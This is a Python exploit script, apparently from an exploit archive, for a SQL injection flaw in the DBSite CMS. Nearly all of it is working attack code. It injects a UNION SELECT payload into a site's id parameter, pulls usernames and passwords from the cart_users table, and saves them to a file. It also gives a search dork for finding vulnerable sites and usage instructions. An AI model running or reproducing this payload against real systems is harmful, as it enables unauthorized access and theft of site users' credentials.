DBSite Remote SQL Injection Vulnerability



#!/usr/bin/env python

# -*- coding: utf-8 -*-
# --------------------------------------------------------
# Exploit Title: DBSite Remote SQL Injection Vulnerability
# Date: 13/10/2010
# Author: God_Of_Pain
# Version: 1.0
# Tested on: Linux
# --------------------------------------------------------
# ========================================================
# Greetz to: LordTittiS3000 && System_Overide
# Example: http://www.site.it/index.php?id=[SQLi]
# Dork: intext:"Powered by DBSite" inurl:index.php?id=
# ========================================================

import urllib2
import sys
import re
import os
import time
import platform

if platform.system() == "Linux":
    os.system('clear')
elif platform.system() == "Windows":
    os.system('cls')

try:
    testo = """
    *****************************************************************
    *          +----------------------------------------+           *
    *          | CMS DBSite SQL Injection Vulnerability |           *
    *          +----------------------------------------+           *
    *          |     Bug Discovered  By God_Of_Pain     |           *
    *          +----------------------------------------+           *
    *          |      Exploit Coded By God_Of_Pain      |           *
    *          +----------------------------------------+           *
    * ============================================================  *
    * +----------------------------------------------------------+  *
    * |               Usage: Exploit.py <site> <id>              |  *
    * +----------------------------------------------------------+  *
    * |  python exploit.py <http://site.com/index.php?ID=> <10>  |  *
    * +----------------------------------------------------------+  *
    *****************************************************************

    """
    print(testo)
    time.sleep(1)

    target = sys.argv[1]
    ID = sys.argv[2]
    http = "http://"
    sql = "+union+select+concat(0x3e3e3e,USERNAME,0x3a3a3a,PWD,0x3e3e3e),2,3+from+cart_users--"
    newid = "-"
    spa = " "

    if http in target:
        del(http)
    sqli = target + newid + ID + sql
    if spa in sqli:
        del(spa)
    print "Ok, Exploiting..."
    print ""
    time.sleep(1)
    print "Please Wait..."
    print ""
    time.sleep(1)
    try:
        prov = urllib2.urlopen(sqli).read()
        prov2 = re.findall(r">>>(.*)([0-9a-zA-Z])([^<>])(.*)>>>", prov)
        if len(prov2) > 1:
            print "+--------------+"
            print "| Exploit Done |"
            print "+--------------+"
            print "User & Pwd =>   " + prov2[0][0] + prov2[0][1]
            time.sleep(1)
            print ""
            print "Saving User && PWD in a .txt file..."
            print ""
            o = open("User&&PwdDBSiteExploit.txt", "w")
            o.write(prov2[0][0] + prov2[0][1])
            o.close()
            print "Saved!"
            print ""
            print "Thanks for using this Exploit!"
        else:
            print "+----------------------+"
            print "|    Exploit Failed    |"
            print "+----------------------+"
            print "|    I'm so sorry :(   |"
            print "+----------------------+"
    except urllib2.HTTPError:
        print "Sorry! Exploit Failed! There is an error :("
except IndexError:
    print "-* Good Luck! *-"

# The End! :)
# -------------------------------------
# http://oversecuritycrew.webnet32.com/
# -------------------------------------